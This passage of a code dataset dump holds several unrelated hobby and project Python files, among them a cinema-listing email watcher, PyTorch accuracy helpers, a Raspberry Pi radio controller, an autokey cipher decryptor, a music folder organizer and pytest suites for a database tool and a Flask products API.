calculate_perimeter(self):\r\n return self.s1 + self.s2 + self.s3 + self.s4 + self.s5 + self.s6\r\n\r\na_hexagon = Hexagon(1, 2, 3, 4, 5, 6)\r\nprint(a_hexagon.calculate_perimeter())\r\n","repo_name":"matabe0320/the-self-taught-programer","sub_path":"Challenge_012.py","file_name":"Challenge_012.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"39781973493","text":"#!/usr/bin/python3\n\nimport requests\nimport urllib.parse\nfrom email.mime.text import MIMEText\n\n\nSEARCHES = [ \n 'Rocky Horror',\n 'Stilyagi',\n 'Whiplash',\n 'Liquid Sky',\n 'A Dangerous Method',\n 'Spirited Away',\n 'Synecdoche',\n 'Hurt Locker',\n 'Monster',\n 'Juno',\n 'Almost Famous',\n ]\n\n\ntry:\n # my login details are hidden here\n # you'll probably want to adjust below instead\n from doh.private import 
mailserver, EMAIL_FROM, EMAIL_TO\nexcept ImportError:\n EMAIL_FROM = 'from@example.com'\n EMAIL_TO = 'to@example.com'\n def mailserver():\n import smtplib\n server = smtplib.SMTP('host', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login('user', 'password')\n return server\n\n\ndef is_showing(searchterm):\n url = 'http://www.zitty.de/list?type=cinema&q=%s' % urllib.parse.quote_plus(searchterm)\n result = requests.get(url).text\n notfound = 'Keine Ergebnisse zu Ihrer Suchanfrage gefunden' in result\n return not notfound\n\n\n\ndef check_all():\n for term in SEARCHES:\n if is_showing(term):\n yield term\n\ndef watchdog():\n found = list(check_all())\n if not found:\n return\n server = mailserver()\n body = '''\n The following films were found showing in Berlin:\n '''\n for f in found:\n body += '\\n\\t\\t%s' % f\n mailtext = MIMEText(body)\n mailtext['To'] = EMAIL_TO\n mailtext['From'] = EMAIL_FROM\n mailtext['Subject'] = 'Films showing: %s' % ','.join(found)\n server.sendmail(EMAIL_FROM, EMAIL_TO, mailtext.as_string())\n\nif __name__ == '__main__':\n watchdog()\n","repo_name":"danohu/filmwatcher","sub_path":"filmwatcher/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6303909365","text":"import logging\nimport time\n\nimport torch\nimport torch.utils.model_zoo as model_zoo\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef validate(val_loader, model, criterion, input_size, print_freq=10):\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(len(val_loader), [batch_time, losses, top1, top5], prefix='Test: ')\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n # warmup, reduce variability of first batch time, especially for comparing torchscript vs non\n # input = torch.randn((50,) + input_size).cuda()\n # model(input)\n end = time.time()\n for i, (images, target) in enumerate(val_loader):\n images = images.cuda()\n target = target.cuda()\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n 
top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % print_freq == 0:\n progress.display(i)\n\n # TODO: this should also be done with the ProgressMeter\n print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'.format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, strict=True):\n if cfg is None:\n cfg = getattr(model, 'default_cfg')\n if cfg is None or 'url' not in cfg or not cfg['url']:\n logging.warning(\"Pretrained model URL is invalid, using random initialization.\")\n return\n\n state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')\n\n if in_chans == 1:\n conv1_name = cfg['first_conv']\n logging.info('Converting first conv (%s) from 3 to 1 channel' % conv1_name)\n conv1_weight = state_dict[conv1_name + '.weight']\n state_dict[conv1_name + '.weight'] = conv1_weight.sum(dim=1, keepdim=True)\n elif in_chans != 3:\n assert False, \"Invalid in_chans for pretrained weights\"\n\n classifier_name = cfg['classifier']\n if num_classes == 1000 and cfg['num_classes'] == 1001:\n # special case for imagenet trained models with extra background class in pretrained weights\n classifier_weight = state_dict[classifier_name + '.weight']\n state_dict[classifier_name + '.weight'] = classifier_weight[1:]\n classifier_bias = state_dict[classifier_name + '.bias']\n state_dict[classifier_name + '.bias'] = classifier_bias[1:]\n elif num_classes != cfg['num_classes']:\n # completely discard fully connected for all other differences between pretrained and created model\n del state_dict[classifier_name + '.weight']\n del state_dict[classifier_name + '.bias']\n strict = False\n\n if filter_fn is not None:\n state_dict = filter_fn(state_dict)\n\n model.load_state_dict(state_dict, strict=strict)\n","repo_name":"mengshaohua666/Attention_TSC_1","sub_path":"tools/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"6964697169","text":"import asyncio\nimport logging\n\nimport RPi.GPIO as GPIO\nimport time\nimport RadioFunktions\nfrom LCD_Display.LCDSpaceArranger import *\nfrom LCD_Display.LCDDisplayManager import DisplayManager\nfrom IOButton.EventManager import Button\nfrom Internal.InternalOperation import InternalOperation\n\n\nprevTime = 0\ndispMan: DisplayManager\nrf: RadioFunktions.Radiofunctions\nButtons: Button\n\n\nasync def setup():\n global dispMan, rf, Buttons # assign the module-level handles used by loop() and the button callbacks\n InternalOperation.configLogging(\"./Radio.log\")\n try:\n InternalOperation.dumpPID()\n InternalOperation.shortenLog(200, \"./Restart.log\")\n dispMan = DisplayManager()\n Buttons = Button()\n rf = RadioFunktions.Radiofunctions()\n except Exception as e:\n logging.error(\"Setup failed\", exc_info=True)\n\n await Buttons.addEvent(19, Power)\n await Buttons.addEvent(13, VolumePlus)\n await Buttons.addEvent(6, VolumeMinus)\n await Buttons.addEvent(9, ChangePlayList)\n await 
Buttons.addEvent(26, ChangeSource)\n await Buttons.addEvent(5, PrevTitle)\n await Buttons.addEvent(11, NextTitle)\n\n # not implemented yet\n\n await dispMan.addContentWithShedule(Refresh, 1, 1)\n print(\"Startup successful\")\n\n\nasync def loop():\n try:\n await Buttons.LookForEvent()\n await dispMan.UpdateDisplay()\n except Exception as e:\n logging.error(\"occurred in mainLoop\", exc_info=True)\n\n\n# Radio Functions\n\nasync def Refresh():\n return rf.getCurrentTitle()\n\n\nasync def Power():\n rf.ChangePowerState()\n await dispMan.toggleDisplay()\n await dispMan.addContentToDisplay(\" \", 1)\n logging.debug(\"Toggle Radio State\")\n\n\nasync def VolumePlus():\n await dispMan.addContentToDisplay(rf.Volume(\"+5\"), 2)\n logging.info(\"add volume\")\n\n\nasync def VolumeMinus():\n await dispMan.addContentToDisplay(rf.Volume(\"-5\"), 2)\n logging.info(\"reduce Volume\")\n\n\nasync def ChangePlayList():\n nPl = rf.ChangePlaylist()\n await dispMan.addContentToDisplay(nPl, 2)\n logging.debug(f\"Change Playlist to {nPl}\")\n\n\nasync def ChangeSource():\n src = rf.Changesource()\n await dispMan.addContentToDisplay(src, 2)\n logging.debug(f\"Change source to {src}\")\n\n\nasync def NextTitle():\n rf.changeTitle(\"up\")\n\n\nasync def PrevTitle():\n rf.changeTitle(\"down\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(setup())\n while (True):\n asyncio.run(loop())\n time.sleep(0.1)\n","repo_name":"LarsDerNorweger/Radio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"25400464080","text":"\ndef char2num(ch:str):\n # map 'a'-'z' (case-insensitive) to 0-25\n return ord(ch.lower()) - 97\n\ndef num2char(num:int):\n # map 0-25 back to 'a'-'z'\n return chr(num + 97)\n\nif __name__ == '__main__':\n \n while True:\n\n try:\n\n key = input()\n encryed = input()\n\n full_key = key\n index = 0\n decryed = \"\"\n # Autokey cipher: each recovered plaintext letter extends the running key\n for ch in encryed:\n decryedChNum:int = char2num(ch) - char2num(full_key[index])\n if decryedChNum < 0:\n decryedChNum += 26\n decryed += num2char(decryedChNum)\n full_key += decryed[-1]\n index += 1\n print(decryed)\n\n except:\n break\n","repo_name":"ImRTon/CipherAlgorithms","sub_path":"HW1 - Decrypt/02_Autokey_Cipher.py","file_name":"02_Autokey_Cipher.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"45519116724","text":"import urllib\n\nfrom django.apps import apps as django_apps\nfrom django.contrib import messages\nfrom django.http.response import HttpResponseRedirect\nfrom django.urls.base import reverse\nfrom django.utils.text import slugify\nfrom django.views.generic.base import TemplateView\nfrom edc_base.view_mixins import EdcBaseViewMixin\nfrom edc_label.label import PrintLabelError\nfrom edc_label.print_server import PrintServerSelectPrinterError\n\nfrom ..mixins.models_view_mixin import ModelsViewMixin\n\n\nclass InvalidPostError(Exception):\n pass\n\n\napp_name = 'edc_pharmacy_dashboard'\napp_config = django_apps.get_app_config(app_name)\n\n\nclass BaseActionView(ModelsViewMixin, EdcBaseViewMixin, TemplateView):\n\n template_name = 'edc_pharmacy_dashboard/home.html'\n post_url_name = None\n app_config_name = 'edc_pharmacy_dashboard'\n\n valid_form_actions = []\n redirect_querystring = {}\n form_action_selected_items_name = 'selected_items'\n label_cls = None\n\n navbar_name = 'pharma'\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._selected_items = []\n self.action = None\n\n 
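# NOTE: resolved lazily from the POSTed form data the first time it is accessed\n 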
@property\n def selected_items(self):\n \"\"\"Returns a list of selected listboard items.\n \"\"\"\n if not self._selected_items:\n self._selected_items = self.request.POST.getlist(\n self.form_action_selected_items_name) or []\n return self._selected_items\n\n @property\n def url_kwargs(self):\n \"\"\"Returns the default dictionary to reverse the post url.\n \"\"\"\n return {}\n\n @property\n def post_url(self):\n \"\"\"Returns a URL.\n \"\"\"\n print(self.post_url_name,\n \" self.post_url_name self.post_url_name self.post_url_name\")\n return reverse(self.post_url_name, kwargs=self.url_kwargs)\n\n def post(self, request, *args, **kwargs):\n action = slugify(self.request.POST.get('action', '').lower())\n if action not in self.valid_form_actions:\n raise InvalidPostError(\n 'Invalid form action in POST. Got {}'.format(action))\n else:\n self.action = action\n self.process_form_action()\n if self.redirect_querystring:\n return HttpResponseRedirect(\n self.post_url + '?'\n + urllib.parse.urlencode(self.redirect_querystring))\n return HttpResponseRedirect(self.post_url)\n\n def process_form_action(self):\n \"\"\"Override to conditionally handle the action POST attr.\n \"\"\"\n pass\n\n def print_labels(self, pks=None):\n \"\"\"Print labels for each selected item.\n\n See also: edc_pharma AppConfig\n \"\"\"\n for pk in pks:\n try:\n label = self.label_cls(pk=pk, children_count=len(pks))\n except PrintServerSelectPrinterError as e:\n messages.error(\n self.request,\n str(e), extra_tags='PrintServerSelectPrinterError')\n break\n else:\n try:\n result = label.print_label()\n except PrintLabelError as e:\n messages.error(self.request, str(e))\n else:\n messages.success(\n self.request,\n f'Printed {result.print_count}/{result.copies} {result.name} to '\n f'{result.printer}. 
JobID {result.jobid}')\n","repo_name":"botswana-harvard/edc-pharmacy-dashboard","sub_path":"edc_pharmacy_dashboard/views/action_views/base_action_view.py","file_name":"base_action_view.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"6080865249","text":"# King: move the king on an 8x8 board; if it steps onto the stone, the stone is pushed one square in the same direction\n\ndelta = [(0, 1), (0, -1), (1, 0), (-1, 0), (-1, 1), (-1, -1), (1, 1), (1, -1)]\n\narr = [[0 for _ in range(8)] for _ in range(8)]\nK, S, N = input().split()\ni, j = 8 - int(K[1]), ord(K[0]) - 65\nii, jj = 8 - int(S[1]), ord(S[0]) - 65\n\nfor _ in range(int(N)):\n move = input()\n if move == 'R':\n dir = 0\n elif move == 'L':\n dir = 1\n elif move == 'B':\n dir = 2\n elif move == 'T':\n dir = 3\n elif move == 'RT':\n dir = 4\n elif move == 'LT':\n dir = 5\n elif move == 'RB':\n dir = 6\n elif move == 'LB':\n dir = 7\n\n ni, nj = i + delta[dir][0], j + delta[dir][1]\n nii, njj = ii + delta[dir][0], jj + delta[dir][1]\n if 0 <= ni < 8 and 0 <= nj < 8:\n if ni == ii and nj == jj:\n if 0 <= nii < 8 and 0 <= njj < 8:\n ii, jj = nii, njj\n else:\n continue\n i, j = ni, nj\n\nsolK = chr(j + 65) + str(8 - i)\nsolS = chr(jj + 65) + str(8 - ii)\nprint(solK, solS, sep='\\\\n')","repo_name":"minguno/Algorithm","sub_path":"BAEKJOON/BOJ_1063.py","file_name":"BOJ_1063.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"1993055244","text":"import os\nimport re\nimport shutil\nimport glob\nimport operator\nfrom pathlib import Path\nfrom tinytag import TinyTag\n\n\ndef get_music_in_directory(path) -> list:\n \"\"\"gets all the music file names in the directory (mp3 and m4a).\n\n Args:\n path (string): the Music folder path.\n\n Returns:\n list: a list of strings that represent the file names.\n \"\"\"\n return glob.glob(path + '*.mp3') + glob.glob(path + '*.m4a')\n\n\ndef add_artist_album_info() -> None:\n \"\"\"\n organizes the raw list of strings (raw_file_names) as a raw list of tuples\n that consist of (song.artist, song.album, file_name).\n \"\"\"\n for i, file in enumerate(raw_file_names):\n tag = TinyTag.get(raw_file_names[i])\n raw_file_names[i] = (tag.artist, tag.album, file)\n\n\ndef sort_raw_data() -> None:\n \"\"\"\n sorts the raw list of tuples (raw_file_names) in an ascending order\n with priority to album, and then file name.\n \"\"\"\n raw_file_names.sort(key=operator.itemgetter(1, 2))\n\n\ndef initialize_sorted_list() -> None:\n \"\"\"\n takes the raw list of tuples (raw_file_names) and extracts each album's data to a list\n which is added to the sorted_music_info list.\n \"\"\"\n album = []\n for file in raw_file_names:\n album_name = file[1]\n\n if raw_file_names.index(file) + 1 == len(raw_file_names):\n album.append(file)\n sorted_music_info.append(album)\n\n elif album_name == raw_file_names[raw_file_names.index(file) + 1][1]:\n album.append(file)\n\n else:\n album.append(file)\n sorted_music_info.append(album)\n album = []\n\n\ndef move_to_directory() -> None:\n \"\"\"\n creates a directory for each album in the format \"artist - album (year)\"\n and then moves each song to its album directory.\n \"\"\"\n for album in sorted_music_info:\n tag = TinyTag.get(album[0][2])\n folder_name = f'{tag.artist} - {tag.album} ({tag.year.split(\"-\",1)[0]})'\n folder_name = re.sub(r'[!@#$%^&*/?\"<:>|\\\\\\\\]', '', folder_name)\n\n if os.path.isdir(folder_name) is False:\n os.mkdir(folder_name)\n for song in album:\n shutil.move(song[2], 
folder_name)\n\n\ndef extract_from_directories():\n \"\"\"\n does the exact opposite job from move_to_directory() (with directory removal)\n mainly for testing purposes.\n \"\"\"\n directories = glob.glob(\"*/\")\n for directory in directories:\n files_to_extract = get_music_in_directory(directory)\n for file in files_to_extract:\n shutil.move(file, os.getcwd())\n os.rmdir(directory)\n\n\nos.chdir(f'{Path.home()}/Music/')\nraw_file_names = get_music_in_directory('')\nsorted_music_info = []\nadd_artist_album_info()\nsort_raw_data()\ninitialize_sorted_list()\nmove_to_directory()\n# extract_from_directories()\n","repo_name":"ImSo3K/music-folderOrganizer","sub_path":"organizer/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72143653364","text":"import pathlib\nimport pytest\nimport shutil\nimport sqlite3\n\nimport pandas as pd\n\nfrom clotho.clothodb import ClothoDB\nfrom clotho.logutils import start_logging\nfrom clotho.resourceshed import ResourceShed\nfrom clotho.tool import Tool\nfrom clotho.toolparam import ToolParam\n\nCONFIG_NAME = 'ClothoConfig.yaml'\nDATA_FOLDER = pathlib.Path(__file__).parents[1] / 'data'\nINPUT_FOLDER = DATA_FOLDER / 'input'\nINPUT_CONFIG = INPUT_FOLDER / CONFIG_NAME\nOUTPUT_FOLDER = DATA_FOLDER / 'output'\nOUTPUT_CONFIG = OUTPUT_FOLDER / CONFIG_NAME\nDB_PATH = OUTPUT_FOLDER / 'TestDB.sqlite'\n\nPARAM1_ID = 'bogus1'\nPARAM2_ID = 'bogus2'\nTOOL_ID = 'bogustool'\n\nCLOTHO_FOLDER = INPUT_FOLDER / 'SkiWX' / 'ClothoDB'\nOUTPUT_CLOTHO_DB = OUTPUT_FOLDER / 'SkiWX' / 'ClothoDB.sqlite'\n\nCONFIG_1 = {\n 'ToolID': TOOL_ID,\n 'ParamID': PARAM1_ID,\n 'Name': 'endpoint',\n 'Value': 'https://devapi.terracon.com/employees/'\n}\nCONFIG_2 = {\n 'ToolID': TOOL_ID,\n 'ParamID': PARAM2_ID,\n 'Name': 'output_csv',\n 'Value': 'C:/Temp/Employees.csv'\n}\n\n\ndef create_db():\n if OUTPUT_CLOTHO_DB.exists():\n OUTPUT_CLOTHO_DB.unlink()\n OUTPUT_CLOTHO_DB.parent.mkdir(parents=True, exist_ok=True)\n connection = sqlite3.connect(OUTPUT_CLOTHO_DB)\n for csv in CLOTHO_FOLDER.glob('*.csv'):\n df = pd.read_csv(csv)\n df.to_sql(csv.stem, connection, if_exists='replace', index=False)\n connection.close()\n\n\ndef write_params():\n db = ClothoDB(DB_PATH)\n db.build_schema()\n db.set_row('ToolParams', CONFIG_1, 'ParamID')\n db.set_row('ToolParams', CONFIG_2, 'ParamID')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n start_logging()\n create_db()\n write_params()\n\n\n@pytest.fixture\ndef db():\n return ClothoDB(DB_PATH)\n\n\ndef get_extractor_gz():\n tool_id = Tool(OUTPUT_CLOTHO_DB, {'Name': 'Extract Weather'}).id\n shed = ResourceShed(OUTPUT_CLOTHO_DB)\n return ToolParam(\n OUTPUT_CLOTHO_DB,\n {'Name': 'gz_file', 'ToolID': tool_id},\n resource_shed=shed\n )\n\n\n@pytest.fixture\ndef extractor_gz():\n return get_extractor_gz()\n\n\n@pytest.fixture\ndef extractor_csv():\n tool_id = Tool(OUTPUT_CLOTHO_DB, {'Name': 'Extract Weather'}).id\n shed = ResourceShed(OUTPUT_CLOTHO_DB)\n return ToolParam(\n OUTPUT_CLOTHO_DB,\n {'Name': 'output_path', 'ToolID': tool_id},\n resource_shed=shed\n )\n\n@pytest.fixture\ndef victim(db):\n return ToolParam(db, id=PARAM1_ID)\n\n\ndef test_init(db):\n param = ToolParam(db, id=PARAM1_ID)\n assert 'devapi' in param.config['Value']\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'output_csv'})\n assert param.config['ParamID'] == PARAM2_ID\n\n param = ToolParam(db)\n assert param.config['ParamID'] is 
None\n\n\ndef test_commit(db):\n row = db.get('ToolParams', \"\"\" \"ParamID\" == '{}' \"\"\".format(PARAM1_ID))\n assert row['Name'].iloc[0] == 'endpoint'\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'EndPoint'})\n param.commit(TOOL_ID)\n\n row = db.get('ToolParams', \"\"\" \"ParamID\" == '{}' \"\"\".format(PARAM1_ID))\n assert row['Name'].iloc[0] == 'EndPoint'\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'query'})\n param.commit(TOOL_ID)\n\n row = db.get('ToolParams', \"\"\" \"Name\" == 'query' \"\"\")\n assert row['ParamID'].iloc[0]\n\n\ndef test_configure(victim):\n victim.configure(CONFIG_2)\n assert victim.id == PARAM2_ID\n\n\ndef test_get_resource(extractor_gz):\n assert extractor_gz.get_resource().name == 'METAR GZ'\n\n\ndef test_id(victim):\n assert victim.id == PARAM1_ID\n\n\ndef test_is_input(extractor_gz, extractor_csv):\n assert extractor_gz.is_input\n assert not extractor_csv.is_input\n\n\ndef test_is_read(extractor_gz, extractor_csv):\n assert extractor_gz.is_read\n\n\ndef test_is_write(extractor_gz, extractor_csv):\n assert extractor_csv.is_write\n\n\ndef test_record_io(extractor_gz):\n extractor_gz.record_io('Activity1', 'My.gz')\n db = ClothoDB(OUTPUT_CLOTHO_DB)\n row = db.get_row('ActivityIO', 'ActivityID', 'Activity1')\n assert row['Value'] == 'My.gz'\n\n\ndef test_value(extractor_gz):\n assert extractor_gz.value is None\n extractor_gz.value = 'asdf'\n assert extractor_gz.value.endswith('ClothoDemo/asdf')\n\n\nif __name__ == '__main__':\n start_logging()\n create_db()\n write_params()\n test_init(ClothoDB(DB_PATH))\n test_value(get_extractor_gz())\n","repo_name":"jswise/Clotho","sub_path":"tests/test_toolparam.py","file_name":"test_toolparam.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"42081224087","text":"'''\nAn exercise to find two numbers that add up to a target in a list of integers.\n'''\nimport sys\n\nnums = []\nTARGET = None # stays None if parsing fails below\ntry:\n TARGET = int(input(\"Enter a target: \"))\nexcept ValueError:\n print(\"That's not a number!\")\nif TARGET is None:\n print(\"User error. Replace user. Fatal error - exiting.\")\n sys.exit()\n\n\nprint(\"Input a blank line to end the list.\")\nwhile True:\n try:\n print(f\"The list so far: {nums}\")\n entry = int(input(\"Enter a number: \"))\n except ValueError:\n print(\"That's not a number!\")\n break\n nums.append(entry)\n\n\nprint(nums)\nfor first_index, num in enumerate(nums):\n for second_index, other_num in enumerate(nums):\n\n if first_index == second_index:\n continue # don't reuse the same element twice\n if nums[first_index] + nums[second_index] == TARGET:\n print(f\"Found it! 
The answer was: {first_index}, {second_index}\")\n print(f\"The solution is {nums[first_index]} and {nums[second_index]}.\")\n sys.exit()\nprint(\"The answer was not found.\")\n","repo_name":"nickvulcan/just_for_fun","sub_path":"solution_check/find_sums.py","file_name":"find_sums.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20301144130","text":"import json\nimport datetime\n\nfrom sqlalchemy.sql import insert\nfrom flask import url_for\n\nfrom app.models.products import Product, Brand, Category\n\n\ndef create_fixture_data(session):\n brands = Brand.metadata.tables['brands']\n categories = Category.metadata.tables['categories']\n products = Product.metadata.tables['products']\n products_categories = Product.metadata.tables['products_categories']\n\n brands_data = [\n {'name': 'Apple', 'country_code': 'US'},\n {'name': 'Milka', 'country_code': 'DE'}\n ]\n\n categories_data = [\n {'name': 'Mobile phones'},\n {'name': 'Food'}\n ]\n\n products_data = [\n {\n 'name': 'iPhone', 'rating': 10, 'featured': True,\n 'items_in_stock': 10, 'receipt_date': None,\n 'created_at': datetime.datetime.utcnow()\n },\n {\n 'name': 'Chocolate', 'rating': 7, 'featured': False,\n 'items_in_stock': 0,\n 'receipt_date': (\n datetime.datetime.utcnow() +\n datetime.timedelta(days=10)\n ),\n 'created_at': datetime.datetime.utcnow()\n }\n ]\n\n # insert initial brands\n for brand in brands_data:\n result = session.execute(insert(brands).values(brand))\n brand['id'] = result.lastrowid\n\n # insert initial categories\n for category in categories_data:\n result = session.execute(insert(categories).values(category))\n category['id'] = result.lastrowid\n\n # insert initial products\n for i, product in enumerate(products_data):\n product['brand_id'] = brands_data[i]['id']\n result = session.execute(insert(products).values(product))\n product['id'] = result.lastrowid\n\n # associate product with a category\n session.execute(insert(products_categories).values({\n 'product_id': product['id'],\n 'category_id': categories_data[i]['id']\n }))\n\n session.commit()\n\n\ndef test_products_empty_list(client):\n url = url_for('products.get_products')\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert json_data['results'] == []\n\n\ndef test_products_list(client, session):\n create_fixture_data(session)\n\n url = url_for('products.get_products')\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert len(json_data['results']) == 2\n\n\ndef test_product_details_not_exists(client):\n\n url = url_for('products.get_product', product_id=1)\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 404\n\n\ndef test_product_details(client, session):\n create_fixture_data(session)\n\n url = url_for('products.get_product', product_id=1)\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert json_data['id'] == 1\n\n\ndef test_product_delete(client, session):\n create_fixture_data(session)\n\n url = url_for('products.delete_product', product_id=1)\n\n with client as c:\n response = c.delete(url)\n\n assert response.status_code == 204\n\n\ndef test_product_delete_not_exists(client):\n url = url_for('products.delete_product', product_id=1)\n\n with client as c:\n response = 
c.delete(url)\n\n assert response.status_code == 204\n\n\ndef test_product_create(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 201\n json_data = json.loads(response.data)\n assert json_data['id'] == 3\n assert json_data['name'] == 'oPhone'\n assert len(json_data['categories']) == 1\n\n\ndef test_product_create_with_invalid_field_name(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # Name length\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'o' * 60,\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert 'name' in json_data['errors']\n assert json_data['errors']['name'][0] == (\n 'Field cannot be longer than 50 characters.'\n )\n\n\ndef test_product_create_with_invalid_field_categories(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # A product must have from 1 to 5 categories.\n\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert 'categories' in json_data['errors']\n assert json_data['errors']['categories'][0] == (\n 'A product must have from 1 to 5 categories'\n )\n\n\ndef test_product_create_with_invalid_field_expiration_date(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # If a product has an expiration date it must expire not\n # less than 30 days since now.\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': datetime.datetime.utcnow().strftime(\n '%Y-%m-%d %H:%M:%S'\n ),\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert json_data['errors']['expiration_date'][0] == (\n 'must expire not less than 30 days since now.'\n )\n\n\ndef test_product_update_not_exists(client, session):\n create_fixture_data(session)\n\n url = url_for('products.update_product', product_id=7)\n\n with client as c:\n response = c.put(url)\n\n assert response.status_code == 404\n\n\ndef test_product_update(client, session):\n create_fixture_data(session)\n\n url = url_for('products.update_product', product_id=2)\n\n with client as c:\n response = c.put(\n url,\n json={\n 'rating': 11.0,\n },\n )\n\n assert response.status_code == 200, response.data\n json_data = json.loads(response.data)\n assert json_data['rating'] == 11.0\n assert json_data['featured'] is True\n","repo_name":"rombr/spark-test-task","sub_path":"tests/test_products_api.py","file_name":"test_products_api.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41118481093","text":"from prophet import 
